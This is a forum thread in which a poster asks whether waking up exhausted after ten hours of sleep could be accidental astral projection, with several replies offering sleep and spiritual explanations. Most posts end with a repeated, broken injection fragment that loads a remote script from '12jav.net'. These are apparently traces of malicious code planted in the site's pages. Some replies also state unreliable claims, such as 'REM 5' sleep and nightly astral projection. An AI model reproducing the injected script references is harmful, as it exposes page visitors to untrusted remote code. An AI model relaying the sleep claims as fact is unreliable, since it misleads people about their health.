Last night I went to bed at 8:30. I wake up feeling worst than last night (sleepier than when I started). It feels like I got no sleep at all, but I slept for about 10 hours. I wanted to know if it was possible that I accidentally astral projected, the reason why I feel like this. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
You could of just had a bad night. Sometimes, even if your are sleeping, you really aren't sleeping. The reson behind this is, you might not of been getting the deep sleep that you need to feel rested. Perhaps last night you had a lighter sleep which is why you are tired.
i normally wake up feeling more tired than when i went to sleep and i have never astral projected at least not that i am aware of so i doubt its astral projection sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
If you don't achieve REM 5(I think that's what it's called) sleep, you don't feel rested. Oversleeping can cause that too. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
astral projection occurs naturally in our sleep every night, it's just that most people are not aware of it. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
Astral that is true for some people, some people are just not aware that they could be astral projeccting with out realizing it or they can not remember they astral projected while they slept that night. For me i know i feel i can astral project at night when i sleep mostly. But a lot of times i can not remember any of it. And so i wonder sometimes when i really weird dreams i wonder if there astral projection or just dreams. You never know our brains when there at sleep at night are a mystery to all of us, no matter how much we learn and study about our dreams, and the way our minds and brains work, we still never truely know what goes on.

Abrican is correct. I believe you need to look at the medical/biological reasons why you can sleep and still feel tired than spiritual reasons. Being overly stressed can also do it. Try meditating before sleeping for the night, do some light stretches and set an alarm for 8 hours. I personally can't sleep more than 8 hours without feeling badly. Low blood sugar can also cause tiredness in the morning. I find that eating yogurt before going to bed allows me to wake up feeling good without causing indigestion overnight. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
